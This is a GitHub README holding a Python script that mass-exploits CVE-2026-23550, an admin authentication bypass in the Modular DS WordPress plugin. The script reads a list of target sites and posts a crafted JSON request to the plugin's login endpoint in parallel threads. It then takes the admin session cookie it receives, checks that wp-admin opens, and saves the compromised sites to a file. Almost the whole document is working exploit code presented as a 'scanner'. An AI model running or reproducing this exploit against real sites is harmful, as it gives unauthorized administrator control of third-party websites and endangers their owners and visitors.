README.md
Rendering markdown...
#!/usr/bin/env python3
"""
██████╗ ███████╗ ███╗ ███╗██╗███╗ ██╗██████╗ ██╗███╗ ██╗ ██╗███████╗ ██████╗████████╗ ██████╗ ██████╗
██╔══██╗╚══███╔╝ ████╗ ████║██║████╗ ██║██╔══██╗ ██║████╗ ██║ ██║██╔════╝██╔════╝╚══██╔══╝██╔═══██╗██╔══██╗
██║ ██║ ███╔╝ ██╔████╔██║██║██╔██╗ ██║██║ ██║ ██║██╔██╗ ██║ ██║█████╗ ██║ ██║ ██║ ██║██████╔╝
██║ ██║ ███╔╝ ██║╚██╔╝██║██║██║╚██╗██║██║ ██║ ██║██║╚██╗██║██ ██║██╔══╝ ██║ ██║ ██║ ██║██╔══██╗
██████╔╝███████╗ ██║ ╚═╝ ██║██║██║ ╚████║██████╔╝ ██║██║ ╚████║╚█████╔╝███████╗╚██████╗ ██║ ╚██████╔╝██║ ██║
╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚═════╝ ╚═╝╚═╝ ╚═══╝ ╚════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝
https://github.com/dzmind2312
CVE-2026-23550 Modular DS Admin Bypass Scanner (Multi-threaded)
"""
import requests
import threading
import time
import sys
import argparse
from concurrent.futures import ThreadPoolExecutor, as_completed
from rich.console import Console
from rich.progress import Progress, SpinnerColumn, TextColumn, BarColumn
from rich.table import Table
from rich import print
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class ModularDSScanner:
def __init__(self, targets_file, threads=20, output="vulns.txt"):
self.console = Console()
self.targets_file = targets_file
self.threads = threads
self.output = output
self.vulnerable = []
self.results = []
def test_target(self, target):
"""Test single target for CVE-2026-23550"""
try:
# Clean target URL
if not target.startswith(('http://', 'https://')):
target = 'https://' + target.lstrip('/')
session = requests.Session()
session.verify = False
# Exploit unauth admin login
endpoint = f"{target.rstrip('/')}/wp-content/plugins/modular-ds/api/modular-connector/login"
response = session.post(
endpoint,
json={"origin": "mo"},
headers={"Content-Type": "application/json"},
timeout=10
)
# Check for admin cookie
admin_cookie = any(
'wordpress_logged_in_' in cookie.name
for cookie in session.cookies
)
# Verify wp-admin access
if admin_cookie:
admin_resp = session.get(f"{target.rstrip('/')}/wp-admin/", timeout=5)
has_admin = any(
word in admin_resp.text.lower()
for word in ['dashboard', 'wp-admin', 'welcome']
)
if has_admin:
self.vulnerable.append(target)
self.results.append({
'target': target,
'status': '🔥 FULL ADMIN ACCESS',
'cookies': len(session.cookies)
})
return f"[green]✅ VULNERABLE: {target}[/green]"
else:
self.results.append({
'target': target,
'status': '⚠️ Admin Cookie (No Dashboard)',
'cookies': len(session.cookies)
})
return f"[yellow]⚠️ Admin Cookie: {target}[/yellow]"
return f"[dim]❌ Not Vulnerable: {target}[/dim]"
except Exception as e:
return f"[red]✗ Error: {target} ({str(e)[:50]})[/red]"
def scan(self):
"""Main scanning logic with progress bar"""
with open(self.targets_file, 'r') as f:
targets = [line.strip() for line in f if line.strip() and not line.startswith('#')]
self.console.print(f"""
[bold cyan]🔥 CVE-2026-23550 Modular DS Scanner 🔥
██████╗ ███████╗ ███╗ ███╗██╗███╗ ██╗██████╗ ██╗███╗ ██╗ ██╗███████╗ ██████╗████████╗ ██████╗ ██████╗
██╔══██╗╚══███╔╝ ████╗ ████║██║████╗ ██║██╔══██╗ ██║████╗ ██║ ██║██╔════╝██╔════╝╚══██╔══╝██╔═══██╗██╔══██╗
██║ ██║ ███╔╝ ██╔████╔██║██║██╔██╗ ██║██║ ██║ ██║██╔██╗ ██║ ██║█████╗ ██║ ██║ ██║ ██║██████╔╝
██║ ██║ ███╔╝ ██║╚██╔╝██║██║██║╚██╗██║██║ ██║ ██║██║╚██╗██║██ ██║██╔══╝ ██║ ██║ ██║ ██║██╔══██╗
██████╔╝███████╗ ██║ ╚═╝ ██║██║██║ ╚████║██████╔╝ ██║██║ ╚████║╚█████╔╝███████╗╚██████╗ ██║ ╚██████╔╝██║ ██║
╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚═════╝ ╚═╝╚═╝ ╚═══╝ ╚════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝
https://github.com/dzmind2312
CVE-2026-23550 Modular DS Admin Bypass Scanner (Multi-threaded)
[/bold cyan]
[bright_black]Targets: {len(targets)} | Threads: {self.threads} | Output: {self.output}[/bright_black]
""")
# Rich progress bar
with Progress(
SpinnerColumn(),
TextColumn("[progress.description]{task.description}"),
BarColumn(),
console=self.console
) as progress:
task = progress.add_task("Scanning Modular DS...", total=len(targets))
with ThreadPoolExecutor(max_workers=self.threads) as executor:
futures = {executor.submit(self.test_target, target): target for target in targets}
for future in as_completed(futures):
result = future.result()
self.console.print(result)
progress.advance(task)
# Summary table
self.console.print("\n" + "="*80)
table = Table(title="Scan Results")
table.add_column("Status", style="cyan")
table.add_column("Target", style="magenta")
table.add_column("Details", style="green")
for result in self.results:
table.add_row(
result['status'],
result['target'],
f"{result['cookies']} cookies"
)
self.console.print(table)
# Save vulnerable
if self.vulnerable:
with open(self.output, 'w') as f:
for vuln in self.vulnerable:
f.write(f"{vuln}\n")
self.console.print(f"\n[bold green]💾 {len(self.vulnerable)} vulnerable targets → {self.output}[/bold green]")
else:
self.console.print("\n[bold green]✅ No vulnerabilities found![/bold green]")
def main():
parser = argparse.ArgumentParser(description="CVE-2026-23550 Modular DS Scanner")
parser.add_argument("-l", "--list", required=True, help="Targets file (one URL per line)")
parser.add_argument("-t", "--threads", type=int, default=20, help="Max threads (default: 20)")
parser.add_argument("-o", "--output", default="vulns.txt", help="Output file (default: vulns.txt)")
args = parser.parse_args()
scanner = ModularDSScanner(args.list, args.threads, args.output)
scanner.scan()
if __name__ == "__main__":
main()